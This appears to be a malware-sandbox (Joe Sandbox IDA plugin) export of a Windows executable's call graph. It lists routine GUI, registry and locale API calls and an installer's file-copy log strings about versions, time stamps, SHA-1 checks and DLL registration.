53907->53908 53909 408883 53908->53909 53910 403450 4 API calls 53909->53910 53911 408890 53910->53911 53912 408558 5 API calls 53911->53912 53913 4088a5 53912->53913 53914 4088c2 53913->53914 53915 4088b3 53913->53915 53917 403494 4 API calls 53914->53917 53916 403494 4 API calls 53915->53916 53918 4088c0 53916->53918 53917->53918 53919 408558 5 API calls 53918->53919 53933 408591 53932->53933 53934 40857f 53932->53934 53936 403494 4 API calls 53933->53936 53935 4034e0 4 API calls 53934->53935 53937 40858f 53935->53937 53936->53937 53937->53880 53939 4085c0 53938->53939 53939->53888 53949 4235f0 SystemParametersInfoA 53940->53949 53943 42365d ShowWindow 53945 423668 53943->53945 53946 42366f 53943->53946 53952 423620 SystemParametersInfoA 53945->53952 53948 423b0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 53946->53948 53948->53843 53950 42360e 53949->53950 53950->53943 53951 423620 SystemParametersInfoA 53950->53951 53951->53943 53952->53946 53956 41db4c 53953->53956 53957 41db32 53956->53957 53958 41db59 53956->53958 53957->53853 53957->53854 53958->53957 53965 40cc68 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53958->53965 53960 41db76 53960->53957 53961 41db90 53960->53961 53962 41db83 53960->53962 53966 41bd84 11 API calls 53961->53966 53967 41b380 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53962->53967 53965->53960 53966->53957 53967->53957 53969 423a35 GetWindowLongA 53968->53969 53970 423a41 53968->53970 53969->53970 53971->53826 53972->53826 53973 46b930 53974 46b964 53973->53974 54007 46bdcd 53973->54007 53975 46b9a0 53974->53975 53978 46b9fc 53974->53978 53979 46b9da 53974->53979 53980 46b9eb 53974->53980 53981 46b9b8 53974->53981 53982 46b9c9 53974->53982 53975->54007 54064 468a9c 53975->54064 53976 403400 4 API calls 53977 46be0c 53976->53977 53984 403400 4 API calls 53977->53984 54296 46b8c0 45 API calls 53978->54296 54029 46b4f0 53979->54029 54295 46b6b0 67 API calls 53980->54295 54293 46b240 47 API calls 53981->54293 54294 46b3a8 42 API calls 53982->54294 53990 46be14 53984->53990 53991 46b9be 53991->53975 53991->54007 53992 46ba38 53993 4942ac 18 API calls 53992->53993 54003 46ba7b 53992->54003 53992->54007 53993->54003 53995 414ae0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53995->54003 53996 46bb9e 54297 482b48 123 API calls 53996->54297 53999 42cbb8 6 API calls 53999->54003 54000 46bbb9 54000->54007 54001 46bbf7 54082 469d44 54001->54082 54002 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54002->54003 54003->53995 54003->53996 54003->53999 54003->54001 54003->54002 54004 46ad88 23 API calls 54003->54004 54003->54007 54025 46bcbf 54003->54025 54067 4689d8 54003->54067 54075 46aaf4 54003->54075 54220 482648 54003->54220 54306 46affc 19 API calls 54003->54306 54004->54003 54007->53976 54008 46ad88 23 API calls 54008->54007 54010 46bc5d 54011 403450 4 API calls 54010->54011 54012 46bc6d 54011->54012 54013 46bcc9 54012->54013 54014 46bc79 54012->54014 54019 46bd8b 54013->54019 54143 46ad88 54013->54143 54015 457d3c 24 API calls 54014->54015 54016 46bc98 54015->54016 54018 457d3c 24 API calls 54016->54018 54018->54025 54025->54008 54307 46c244 54029->54307 54032 46b672 54033 403420 4 API calls 54032->54033 54035 46b68c 54033->54035 54034 414ae0 4 API calls 54036 46b53e 54034->54036 54038 403400 4 API calls 54035->54038 54037 46b65e 54036->54037 54310 455f58 13 API calls 54036->54310 54037->54032 54040 403450 4 API calls 54037->54040 54041 46b694 54038->54041 54040->54032 54042 403400 4 API calls 54041->54042 54043 46b69c 54042->54043 54043->53975 54044 46b621 54044->54032 54044->54037 54050 42cd40 7 API calls 54044->54050 54045 42cd40 7 API calls 54047 46b5fa 54045->54047 54046 46b5c1 54046->54032 54046->54044 54046->54045 54047->54044 54051 45142c 4 API calls 54047->54051 54048 46b55c 54048->54046 54311 466428 54048->54311 54053 46b637 54050->54053 54054 46b611 54051->54054 54053->54037 54056 45142c 4 API calls 54053->54056 54316 47e618 42 API calls 54054->54316 54055 466428 19 API calls 54058 46b59c 54055->54058 54059 46b64e 54056->54059 54060 4513fc 4 API calls 54058->54060 54317 47e618 42 API calls 54059->54317 54062 46b5b1 54060->54062 54315 47e618 42 API calls 54062->54315 54065 4689d8 19 API calls 54064->54065 54066 468aab 54065->54066 54066->53992 54070 468a07 54067->54070 54068 4078e4 19 API calls 54069 468a40 54068->54069 54437 453318 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54069->54437 54070->54068 54072 468a48 54070->54072 54073 403400 4 API calls 54072->54073 54074 468a60 54073->54074 54074->54003 54076 46ab05 54075->54076 54077 46ab00 54075->54077 54523 4698a8 46 API calls 54076->54523 54081 46ab03 54077->54081 54438 46a560 54077->54438 54079 46ab0d 54079->54003 54081->54003 54083 403400 4 API calls 54082->54083 54084 469d72 54083->54084 54546 47d4e4 54084->54546 54086 469dd5 54087 469df2 54086->54087 54088 469dd9 54086->54088 54090 469de3 54087->54090 54556 49419c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54087->54556 54553 466628 54088->54553 54093 469f11 54090->54093 54094 469f7c 54090->54094 54142 46a086 54090->54142 54092 469e0e 54092->54090 54096 469e16 54092->54096 54097 403494 4 API calls 54093->54097 54098 403494 4 API calls 54094->54098 54095 403420 4 API calls 54099 46a0b0 54095->54099 54100 46ad88 23 API calls 54096->54100 54101 469f1e 54097->54101 54102 469f89 54098->54102 54099->54010 54103 469e23 54100->54103 54104 40357c 4 API calls 54101->54104 54105 40357c 4 API calls 54102->54105 54115 469e64 54103->54115 54116 469e4c SetActiveWindow 54103->54116 54106 469f2b 54104->54106 54107 469f96 54105->54107 54108 40357c 4 API calls 54106->54108 54109 40357c 4 API calls 54107->54109 54110 469f38 54108->54110 54111 469fa3 54109->54111 54112 40357c 4 API calls 54110->54112 54113 40357c 4 API calls 54111->54113 54117 469f45 54112->54117 54114 469fb0 54113->54114 54119 40357c 4 API calls 54114->54119 54557 42f558 54115->54557 54116->54115 54118 466628 20 API calls 54117->54118 54120 469f53 54118->54120 54121 469fbe 54119->54121 54122 40357c 4 API calls 54120->54122 54123 414b10 4 API calls 54121->54123 54125 469f5c 54122->54125 54126 469f7a 54123->54126 54128 40357c 4 API calls 54125->54128 54574 466960 54126->54574 54132 469f69 54128->54132 54131 469eb5 54134 46ac04 21 API calls 54131->54134 54133 414b10 4 API calls 54132->54133 54133->54126 54135 469ee7 54134->54135 54135->54010 54136 469fe0 54137 414b10 4 API calls 54136->54137 54136->54142 54138 46a043 54137->54138 54577 49505c MulDiv 54138->54577 54140 46a060 54141 414b10 4 API calls 54140->54141 54141->54142 54142->54095 54144 468a9c 19 API calls 54143->54144 54145 46ada0 54144->54145 54146 46adc2 54145->54146 54147 4650f4 7 API calls 54145->54147 54663 4650f4 54146->54663 54147->54146 54151 46adda 54152 46ac04 21 API calls 54151->54152 54153 46ae12 54152->54153 54154 414b10 4 API calls 54153->54154 54155 46ae26 54154->54155 54156 46ae32 54155->54156 54157 46ae5c 54155->54157 54158 414b10 4 API calls 54156->54158 54160 46ae7b 54157->54160 54161 46aea5 54157->54161 54159 46ae46 54158->54159 54163 414b10 4 API calls 54159->54163 54164 414b10 4 API calls 54160->54164 54162 414b10 4 API calls 54161->54162 54165 46aeb9 54162->54165 54166 46ae5a 54163->54166 54167 46ae8f 54164->54167 54168 414b10 4 API calls 54165->54168 54680 46ab1c 54166->54680 54169 414b10 4 API calls 54167->54169 54168->54166 54169->54166 54173 468a9c 19 API calls 54175 46af57 54173->54175 54174 46aef7 54174->54173 54221 46c244 48 API calls 54220->54221 54222 48268b 54221->54222 54223 482694 54222->54223 54922 408bd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54222->54922 54225 414ae0 4 API calls 54223->54225 54226 4826a4 54225->54226 54227 403450 4 API calls 54226->54227 54228 4826b1 54227->54228 54732 46c59c 54228->54732 54231 4826c1 54233 414ae0 4 API calls 54231->54233 54234 4826d1 54233->54234 54235 403450 4 API calls 54234->54235 54236 4826de 54235->54236 54237 469690 SendMessageA 54236->54237 54238 4826f7 54237->54238 54239 482748 54238->54239 54924 4797dc 23 API calls 54238->54924 54241 4241d4 11 API calls 54239->54241 54242 482752 54241->54242 54243 482778 54242->54243 54244 482763 SetActiveWindow 54242->54244 54761 481a78 54243->54761 54244->54243 54293->53991 54294->53975 54295->53975 54296->53975 54297->54000 54306->54003 54318 46c2dc 54307->54318 54310->54048 54312 466442 54311->54312 54313 4078e4 19 API calls 54312->54313 54314 46647d 54313->54314 54314->54055 54315->54046 54316->54044 54317->54037 54319 414ae0 4 API calls 54318->54319 54320 46c310 54319->54320 54379 4666c0 54320->54379 54324 46c322 54325 46c331 54324->54325 54329 46c34a 54324->54329 54413 47e618 42 API calls 54325->54413 54327 403420 4 API calls 54328 46b522 54327->54328 54328->54032 54328->54034 54330 46c391 54329->54330 54331 46c378 54329->54331 54332 46c3f6 54330->54332 54337 46c395 54330->54337 54414 47e618 42 API calls 54331->54414 54416 42cb44 CharNextA 54332->54416 54335 46c405 54336 46c409 54335->54336 54341 46c422 54335->54341 54417 47e618 42 API calls 54336->54417 54339 46c3dd 54337->54339 54337->54341 54415 47e618 42 API calls 54339->54415 54340 46c446 54418 47e618 42 API calls 54340->54418 54341->54340 54393 466830 54341->54393 54346 46c345 54346->54327 54349 46c45f 54350 403778 4 API calls 54349->54350 54351 46c475 54350->54351 54401 42c994 54351->54401 54354 46c486 54419 4668bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54354->54419 54355 46c4b7 54357 42c8c4 5 API calls 54355->54357 54359 46c4c2 54357->54359 54358 46c499 54360 45142c 4 API calls 54358->54360 54361 42c3f4 5 API calls 54359->54361 54362 46c4a6 54360->54362 54363 46c4cd 54361->54363 54420 47e618 42 API calls 54362->54420 54365 42cbb8 6 API calls 54363->54365 54366 46c4d8 54365->54366 54405 46c270 54366->54405 54368 46c4e0 54369 42cd40 7 API calls 54368->54369 54370 46c4e8 54369->54370 54371 46c502 54370->54371 54372 46c4ec 54370->54372 54371->54346 54374 46c50c 54371->54374 54421 47e618 42 API calls 54372->54421 54375 46c514 GetDriveTypeA 54374->54375 54375->54346 54376 46c51f 54375->54376 54382 4666da 54379->54382 54381 42cbb8 6 API calls 54381->54382 54382->54381 54383 403450 4 API calls 54382->54383 54384 406ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54382->54384 54385 466723 54382->54385 54423 42caa4 54382->54423 54383->54382 54384->54382 54386 403420 4 API calls 54385->54386 54387 46673d 54386->54387 54388 414b10 54387->54388 54389 414ae0 4 API calls 54388->54389 54390 414b34 54389->54390 54391 403400 4 API calls 54390->54391 54392 414b65 54391->54392 54392->54324 54394 46683a 54393->54394 54395 46684d 54394->54395 54434 42cb34 CharNextA 54394->54434 54395->54340 54397 466860 54395->54397 54399 46686a 54397->54399 54398 466897 54398->54340 54398->54349 54399->54398 54435 42cb34 CharNextA 54399->54435 54402 42c9ed 54401->54402 54403 42c9aa 54401->54403 54402->54354 54402->54355 54403->54402 54436 42cb34 CharNextA 54403->54436 54406 46c2d5 54405->54406 54407 46c283 54405->54407 54406->54368 54407->54406 54408 41ee9c 2 API calls 54407->54408 54409 46c293 54408->54409 54410 46c2ad SHPathPrepareForWriteA 54409->54410 54411 41ef50 6 API calls 54410->54411 54412 46c2cd 54411->54412 54412->54368 54413->54346 54414->54346 54415->54346 54416->54335 54417->54346 54418->54346 54419->54358 54420->54346 54421->54346 54424 403494 4 API calls 54423->54424 54425 42cab4 54424->54425 54426 403744 4 API calls 54425->54426 54429 42caea 54425->54429 54432 42c43c IsDBCSLeadByte 54425->54432 54426->54425 54428 42cb2e 54428->54382 54429->54428 54431 4037b8 4 API calls 54429->54431 54433 42c43c IsDBCSLeadByte 54429->54433 54431->54429 54432->54425 54433->54429 54434->54394 54435->54399 54436->54403 54437->54072 54440 46a5a7 54438->54440 54439 46aa1f 54442 46aa3a 54439->54442 54443 46aa6b 54439->54443 54440->54439 54441 46a662 54440->54441 54445 403494 4 API calls 54440->54445 54444 46a683 54441->54444 54449 46a6c4 54441->54449 54446 403494 4 API calls 54442->54446 54447 403494 4 API calls 54443->54447 54450 403494 4 API calls 54444->54450 54451 46a5e6 54445->54451 54452 46aa48 54446->54452 54448 46aa79 54447->54448 54542 468f84 12 API calls 54448->54542 54457 403400 4 API calls 54449->54457 54454 46a691 54450->54454 54455 414ae0 4 API calls 54451->54455 54541 468f84 12 API calls 54452->54541 54458 414ae0 4 API calls 54454->54458 54459 46a607 54455->54459 54472 46a6c2 54457->54472 54461 46a6b2 54458->54461 54462 403634 4 API calls 54459->54462 54460 403400 4 API calls 54465 46aa9c 54460->54465 54467 403634 4 API calls 54461->54467 54468 46a617 54462->54468 54463 46aa56 54463->54460 54471 403400 4 API calls 54465->54471 54466 46a830 54469 403400 4 API calls 54466->54469 54467->54472 54473 414ae0 4 API calls 54468->54473 54474 46a82e 54469->54474 54470 46a6e4 54475 46a722 54470->54475 54476 46a6ea 54470->54476 54477 46aaa4 54471->54477 54518 46a7a8 54472->54518 54524 469690 54472->54524 54478 46a62b 54473->54478 54536 469acc 43 API calls 54474->54536 54481 403400 4 API calls 54475->54481 54479 403494 4 API calls 54476->54479 54480 403420 4 API calls 54477->54480 54478->54441 54482 414ae0 4 API calls 54478->54482 54483 46a6f8 54479->54483 54484 46aab1 54480->54484 54486 46a720 54481->54486 54487 46a652 54482->54487 54489 47bb50 43 API calls 54483->54489 54484->54081 54485 46a7ef 54490 403494 4 API calls 54485->54490 54530 469984 54486->54530 54491 403634 4 API calls 54487->54491 54493 46a710 54489->54493 54494 46a7fd 54490->54494 54491->54441 54492 46a859 54500 46a864 54492->54500 54501 46a8ba 54492->54501 54496 403634 4 API calls 54493->54496 54497 414ae0 4 API calls 54494->54497 54496->54486 54499 46a81e 54497->54499 54498 46a749 54505 46a754 54498->54505 54506 46a7aa 54498->54506 54502 403634 4 API calls 54499->54502 54504 403494 4 API calls 54500->54504 54503 403400 4 API calls 54501->54503 54502->54474 54509 46a8c2 54503->54509 54510 46a872 54504->54510 54508 403494 4 API calls 54505->54508 54507 403400 4 API calls 54506->54507 54507->54518 54513 46a762 54508->54513 54522 46a96b 54509->54522 54537 49419c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54509->54537 54510->54509 54514 403634 4 API calls 54510->54514 54516 46a8b8 54510->54516 54512 46a8e5 54512->54522 54538 494448 18 API calls 54512->54538 54517 403634 4 API calls 54513->54517 54513->54518 54514->54510 54516->54509 54517->54513 54518->54466 54518->54485 54520 46aa0c 54540 42913c SendMessageA SendMessageA 54520->54540 54539 4290ec SendMessageA 54522->54539 54523->54079 54543 42a038 SendMessageA 54524->54543 54526 46969f 54527 4696bf 54526->54527 54544 42a038 SendMessageA 54526->54544 54527->54470 54529 4696af 54529->54470 54534 4699b1 54530->54534 54531 469a13 54532 403400 4 API calls 54531->54532 54533 469a28 54532->54533 54533->54498 54534->54531 54545 469908 43 API calls 54534->54545 54536->54492 54537->54512 54538->54522 54539->54520 54540->54439 54541->54463 54542->54463 54543->54526 54544->54529 54545->54534 54547 47d4fd 54546->54547 54551 47d53a 54546->54551 54578 455ce0 54547->54578 54551->54086 54552 47d551 54552->54086 54633 46653c 54553->54633 54556->54092 54558 42f564 54557->54558 54559 42f587 GetActiveWindow GetFocus 54558->54559 54560 41ee9c 2 API calls 54559->54560 54561 42f59e 54560->54561 54562 42f5bb 54561->54562 54563 42f5ab RegisterClassA 54561->54563 54564 42f64a SetFocus 54562->54564 54565 42f5c9 CreateWindowExA 54562->54565 54563->54562 54567 403400 4 API calls 54564->54567 54565->54564 54566 42f5fc 54565->54566 54654 424274 54566->54654 54569 42f666 54567->54569 54573 494448 18 API calls 54569->54573 54570 42f624 54571 42f62c CreateWindowExA 54570->54571 54571->54564 54572 42f642 ShowWindow 54571->54572 54572->54564 54573->54131 54660 44b50c 54574->54660 54576 466967 54576->54136 54577->54140 54579 455cf1 54578->54579 54580 455cf5 54579->54580 54581 455cfe 54579->54581 54604 4559e4 54580->54604 54612 455ac4 29 API calls 54581->54612 54584 455cfb 54584->54551 54585 47d154 54584->54585 54587 47d250 54585->54587 54588 47d194 54585->54588 54586 403420 4 API calls 54589 47d333 54586->54589 54590 4790c4 19 API calls 54587->54590 54594 47d2a1 54587->54594 54600 47d1f3 54587->54600 54588->54587 54592 479368 4 API calls 54588->54592 54597 47bb50 43 API calls 54588->54597 54588->54600 54602 47d1fc 54588->54602 54621 479204 54588->54621 54589->54552 54590->54587 54592->54588 54593 47bb50 43 API calls 54593->54594 54594->54587 54594->54593 54596 4540d4 20 API calls 54594->54596 54599 47d23d 54594->54599 54595 47bb50 43 API calls 54595->54602 54596->54594 54597->54588 54598 42c924 5 API calls 54598->54602 54599->54600 54600->54586 54601 42c94c 5 API calls 54601->54602 54602->54588 54602->54595 54602->54598 54602->54599 54602->54601 54632 47ce60 52 API calls 54602->54632 54605 42de14 RegOpenKeyExA 54604->54605 54606 455a01 54605->54606 54607 455a4f 54606->54607 54613 455918 54606->54613 54607->54584 54610 455918 6 API calls 54611 455a30 RegCloseKey 54610->54611 54611->54584 54612->54584 54618 42dd50 54613->54618 54615 455940 54616 403420 4 API calls 54615->54616 54617 4559ca 54616->54617 54617->54610 54619 42dbf8 6 API calls 54618->54619 54620 42dd59 54619->54620 54620->54615 54622 479216 54621->54622 54623 47921a 54621->54623 54622->54588 54624 403450 4 API calls 54623->54624 54625 479227 54624->54625 54626 479247 54625->54626 54627 47922d 54625->54627 54629 4790c4 19 API calls 54626->54629 54628 4790c4 19 API calls 54627->54628 54630 479243 54628->54630 54629->54630 54631 403400 4 API calls 54630->54631 54631->54622 54632->54602 54634 403494 4 API calls 54633->54634 54635 46656a 54634->54635 54636 42dbc0 5 API calls 54635->54636 54637 46657c 54636->54637 54638 42dbc0 5 API calls 54637->54638 54639 46658e 54638->54639 54640 466428 19 API calls 54639->54640 54641 466598 54640->54641 54642 42dbc0 5 API calls 54641->54642 54643 4665a7 54642->54643 54650 4664a0 54643->54650 54646 42dbc0 5 API calls 54647 4665c0 54646->54647 54648 403400 4 API calls 54647->54648 54649 4665d5 54648->54649 54649->54090 54651 4664c0 54650->54651 54652 4078e4 19 API calls 54651->54652 54653 46650a 54652->54653 54653->54646 54655 4242a6 54654->54655 54656 424286 GetWindowTextA 54654->54656 54658 403494 4 API calls 54655->54658 54657 4034e0 4 API calls 54656->54657 54659 4242a4 54657->54659 54658->54659 54659->54570 54661 44b384 11 API calls 54660->54661 54662 44b51f 54661->54662 54662->54576 54665 4650ff 54663->54665 54664 4651da 54674 466eb4 54664->54674 54665->54664 54669 46514f 54665->54669 54686 421a14 54665->54686 54666 465192 54666->54664 54692 4185b0 7 API calls 54666->54692 54669->54666 54670 465194 54669->54670 54671 465189 54669->54671 54673 421a14 7 API calls 54670->54673 54672 421a14 7 API calls 54671->54672 54672->54666 54673->54666 54675 466ee4 54674->54675 54676 466ec5 54674->54676 54675->54151 54677 414b10 4 API calls 54676->54677 54678 466ed3 54677->54678 54679 414b10 4 API calls 54678->54679 54679->54675 54681 46ab29 54680->54681 54682 421a14 7 API calls 54681->54682 54683 46abb4 54682->54683 54683->54174 54684 466988 18 API calls 54683->54684 54684->54174 54687 421a6c 54686->54687 54690 421a22 54686->54690 54687->54669 54688 421a51 54688->54687 54693 421d20 SetFocus GetFocus 54688->54693 54690->54688 54691 408cac 5 API calls 54690->54691 54691->54688 54692->54664 54693->54687 54733 46c5c5 54732->54733 54734 46c612 54733->54734 54735 414ae0 4 API calls 54733->54735 54737 403420 4 API calls 54734->54737 54736 46c5db 54735->54736 54931 46674c 6 API calls 54736->54931 54739 46c6bc 54737->54739 54739->54231 54923 408bd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54739->54923 54740 46c5e3 54741 414b10 4 API calls 54740->54741 54742 46c5f1 54741->54742 54743 46c5fe 54742->54743 54745 46c617 54742->54745 54932 47e618 42 API calls 54743->54932 54746 46c62f 54745->54746 54747 466830 CharNextA 54745->54747 54933 47e618 42 API calls 54746->54933 54749 46c62b 54747->54749 54749->54746 54750 46c645 54749->54750 54751 46c661 54750->54751 54752 46c64b 54750->54752 54754 42c994 CharNextA 54751->54754 54934 47e618 42 API calls 54752->54934 54755 46c66e 54754->54755 54755->54734 54935 4668bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54755->54935 54757 46c685 54758 45142c 4 API calls 54757->54758 54759 46c692 54758->54759 54936 47e618 42 API calls 54759->54936 54762 481ac9 54761->54762 54763 481a9b 54761->54763 54765 475934 54762->54765 54937 4941f8 18 API calls 54763->54937 54766 457b30 24 API calls 54765->54766 54767 475980 54766->54767 54768 407298 SetCurrentDirectoryA 54767->54768 54769 47598a 54768->54769 54938 46e128 54769->54938 54773 47599a 54946 459f68 54773->54946 54924->54239 54931->54740 54932->54734 54933->54734 54934->54734 54935->54757 54936->54734 54937->54762 54939 46e19b 54938->54939 54941 46e145 54938->54941 54942 46e1a0 54939->54942 54940 479204 19 API calls 54940->54941 54941->54939 54941->54940 54943 46e1c6 54942->54943 55386 44faf0 54943->55386 54945 46e222 54945->54773 55389 44fb04 55386->55389 55390 44fb15 55389->55390 55391 44fb01 55390->55391 55392 44fb3f MulDiv 55390->55392 55391->54945 55393 4181d8 55392->55393 55394 44fb6a SendMessageA 55393->55394 55394->55391 56437 416b3a 56438 416be2 56437->56438 56439 416b52 56437->56439 56456 415314 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56438->56456 56440 416b60 56439->56440 56441 416b6c SendMessageA 56439->56441 56443 416b86 56440->56443 56444 416b6a CallWindowProcA 56440->56444 56452 416bc0 56441->56452 56453 41a050 GetSysColor 56443->56453 56444->56452 56447 416b91 SetTextColor 56448 416ba6 56447->56448 56454 41a050 GetSysColor 56448->56454 56450 416bab SetBkColor 56455 41a6d8 GetSysColor CreateBrushIndirect 56450->56455 56453->56447 56454->56450 56455->56452 56456->56452 56457 4980b4 56515 403344 56457->56515 56459 4980c2 56518 4056a0 56459->56518 56461 4980c7 56521 40631c GetModuleHandleA GetProcAddress 56461->56521 56467 4980d6 56538 41094c 56467->56538 56469 4980db 56542 412920 56469->56542 56471 4980e5 56547 419038 GetVersion 56471->56547 56788 4032fc 56515->56788 56517 403349 GetModuleHandleA GetCommandLineA 56517->56459 56519 4056db 56518->56519 56789 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56518->56789 56519->56461 56522 406338 56521->56522 56523 40633f GetProcAddress 56521->56523 56522->56523 56524 406355 GetProcAddress 56523->56524 56525 40634e 56523->56525 56526 406364 SetProcessDEPPolicy 56524->56526 56527 406368 56524->56527 56525->56524 56526->56527 56528 40993c 56527->56528 56790 409014 56528->56790 56533 408710 7 API calls 56534 40995f 56533->56534 56805 409060 GetVersionExA 56534->56805 56537 409b70 6F551CD0 56537->56467 56539 410956 56538->56539 56540 410995 GetCurrentThreadId 56539->56540 56541 4109b0 56540->56541 56541->56469 56807 40aef4 56542->56807 56546 41294c 56546->56471 56819 41de1c 8 API calls 56547->56819 56549 419051 56821 418f30 GetCurrentProcessId 56549->56821 56788->56517 56789->56519 56791 408cac 5 API calls 56790->56791 56792 409025 56791->56792 56793 4085cc GetSystemDefaultLCID 56792->56793 56795 408602 56793->56795 56794 406ddc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56794->56795 56795->56794 56796 408558 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 56795->56796 56797 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56795->56797 56799 408664 56795->56799 56796->56795 56797->56795 56798 406ddc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56798->56799 56799->56798 56800 408558 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 56799->56800 56801 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56799->56801 56802 4086e7 56799->56802 56800->56799 56801->56799 56803 403420 4 API calls 56802->56803 56804 408701 56803->56804 56804->56533 56806 409077 56805->56806 56806->56537 56809 40aefb 56807->56809 56808 40af1a 56811 411004 56808->56811 56809->56808 56818 40ae2c 19 API calls 56809->56818 56812 411026 56811->56812 56813 406ddc 5 API calls 56812->56813 56814 403450 4 API calls 56812->56814 56815 411045 56812->56815 56813->56812 56814->56812 56816 403400 4 API calls 56815->56816 56817 41105a 56816->56817 56817->56546 56818->56809 56820 41de96 56819->56820 56820->56549 56837 4078b0 56821->56837 58098 41663c 58099 4166a3 58098->58099 58100 416649 58098->58100 58106 4162c2 58100->58106 58110 416548 CreateWindowExA 58100->58110 58101 416650 SetPropA SetPropA 58101->58099 58102 416683 58101->58102 58103 416696 SetWindowPos 58102->58103 58103->58099 58107 4162ee 58106->58107 58108 4162ce GetClassInfoA 58106->58108 58107->58101 58108->58107 58109 4162e2 GetClassInfoA 58108->58109 58109->58107 58110->58101
                                                          Strings
                                                          • Version of our file: (none), xrefs: 0047091C
                                                          • Skipping due to "onlyifdestfileexists" flag., xrefs: 00470D1A
                                                          • , xrefs: 004709EF, 00470BC0, 00470C3E
                                                          • Will register the file (a type library) later., xrefs: 00471319
                                                          • Skipping due to "onlyifdoesntexist" flag., xrefs: 004707EE
                                                          • Incrementing shared file count (64-bit)., xrefs: 00471392
                                                          • .tmp, xrefs: 00470DD7
                                                          • Failed to strip read-only attribute., xrefs: 00470CF3
                                                          • Existing file has a later time stamp. Skipping., xrefs: 00470BEF
                                                          • Non-default bitness: 64-bit, xrefs: 004706CF
                                                          • -- File entry --, xrefs: 0047051B
                                                          • Existing file is a newer version. Skipping., xrefs: 00470A22
                                                          • Same time stamp. Skipping., xrefs: 00470B75
                                                          • Version of existing file: (none), xrefs: 00470B1A
                                                          • @, xrefs: 004705D0
                                                          • Will register the file (a DLL/OCX) later., xrefs: 00471325
                                                          • Uninstaller requires administrator: %s, xrefs: 00470F95
                                                          • Time stamp of our file: (failed to read), xrefs: 004707C7
                                                          • InUn, xrefs: 00470F65
                                                          • Non-default bitness: 32-bit, xrefs: 004706DB
                                                          • Time stamp of existing file: (failed to read), xrefs: 00470857
                                                          • Time stamp of our file: %s, xrefs: 004707BB
                                                          • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 00470CB6
                                                          • Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 00470AF0
                                                          • Stripped read-only attribute., xrefs: 00470CE7
                                                          • Dest filename: %s, xrefs: 004706B4
                                                          • User opted not to overwrite the existing file. Skipping., xrefs: 00470C6D
                                                          • p%G, xrefs: 0047151A
                                                          • Dest file is protected by Windows File Protection., xrefs: 0047070D
                                                          • Dest file exists., xrefs: 004707DB
                                                          • Existing file is protected by Windows File Protection. Skipping., xrefs: 00470C0C
                                                          • Time stamp of existing file: %s, xrefs: 0047084B
                                                          • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 00470AD5
                                                          • Version of our file: %u.%u.%u.%u, xrefs: 00470910
                                                          • Version of existing file: %u.%u.%u.%u, xrefs: 0047099C
                                                          • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 00470AE4
                                                          • Same version. Skipping., xrefs: 00470B05
                                                          • Couldn't read time stamp. Skipping., xrefs: 00470B55
                                                          • Installing the file., xrefs: 00470D29
                                                          • Incrementing shared file count (32-bit)., xrefs: 004713AB
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.$p%G
                                                          • API String ID: 0-1519224904
                                                          • Opcode ID: c85e02cee53c90be4c09432cdc1bed37a126afc3c982ec3092a00699d9325f6e
